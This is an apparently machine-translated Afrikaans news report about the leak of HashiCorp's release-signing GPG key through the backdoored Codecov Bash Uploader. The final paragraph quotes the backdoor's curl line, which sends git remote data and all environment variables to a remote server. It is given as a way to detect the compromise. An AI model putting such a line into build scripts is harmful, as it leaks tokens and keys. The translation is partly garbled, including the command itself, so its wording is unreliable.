HashiCorp, bekend vir die ontwikkeling van die oopbronnutsgoed Vagrant, Packer, Nomad en Terraform, het die lekkasie aangekondig van die private GPG-sleutel wat gebruik word om digitale handtekeninge te skep wat vrystellings verifieer. Aanvallers wat toegang tot die GPG-sleutel verkry het, kan moontlik verborge veranderinge aan HashiCorp-produkte maak deur dit met 'n korrekte digitale handtekening te verifieer. Die maatskappy het terselfdertyd verklaar dat daar tydens die oudit geen spore van pogings om sulke wysigings aan te bring, geïdentifiseer is nie.
Die gekompromitteerde GPG-sleutel is nou herroep en met 'n nuwe sleutel vervang. Die probleem het slegs verifikasie met behulp van die SHA256SUM- en SHA256SUM.sig-lêers beïnvloed en het nie die generering van digitale handtekeninge vir ... beïnvloed nie. Linux-DEB- en RPM-pakkette wat deur releases.hashicorp.com afgelewer word, sowel as vrystellingsgoedkeuringsmeganismes vir macOS и Windows (Outentikode).
Die lek het plaasgevind as gevolg van die gebruik van die Codecov Bash Uploader (codecov-bash) skrip binne die infrastruktuur, wat ontwerp is om dekkingsverslae van deurlopende integrasiestelsels af te laai. Tydens die aanval op Codecov is 'n agterdeur in die geheim in die skrip geplaas, wat gebruik is om wagwoorde en enkripsiesleutels te stuur na bediener indringers.
Om te hack, het die aanvallers gebruik gemaak van 'n fout in die proses om die Codecov Docker-beeld te skep, wat hulle in staat gestel het om toegangsdata na GCS (Google Cloud Storage) te onttrek, wat nodig is om veranderinge aan te bring aan die Bash Uploader-skrip wat vanaf die codecov.io versprei is webwerf. Die veranderinge is op 31 Januarie aangebring, het vir twee maande onopgemerk gebly en het aanvallers in staat gestel om inligting te onttrek wat in klante se deurlopende integrasiestelselomgewings gestoor is. Deur die bygevoegde kwaadwillige kode te gebruik, kon aanvallers inligting oor die getoetste Git-bewaarplek en alle omgewingsveranderlikes bekom, insluitend tokens, enkripsiesleutels en wagwoorde wat na deurlopende integrasiestelsels oorgedra word om toegang tot toepassingskode, bewaarplekke en dienste soos Amazon Web Services en GitHub te organiseer.
Benewens die direkte oproep, is die Codecov Bash Uploader-skrip gebruik as deel van ander oplaaiers, soos Codecov-action (Github), Codecov-circleci-orb en Codecov-bitrise-step, wie se gebruikers ook deur die probleem geraak word. Alle gebruikers van codecov-bash en verwante produkte word aanbeveel om hul infrastruktuur te oudit, sowel as om wagwoorde en enkripsiesleutels te verander. Jy kan die teenwoordigheid van 'n agterdeur in 'n skrif kontroleer deur die teenwoordigheid van die lynkrul -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /oplaai/v2 || waar
Bron: opennet.ru
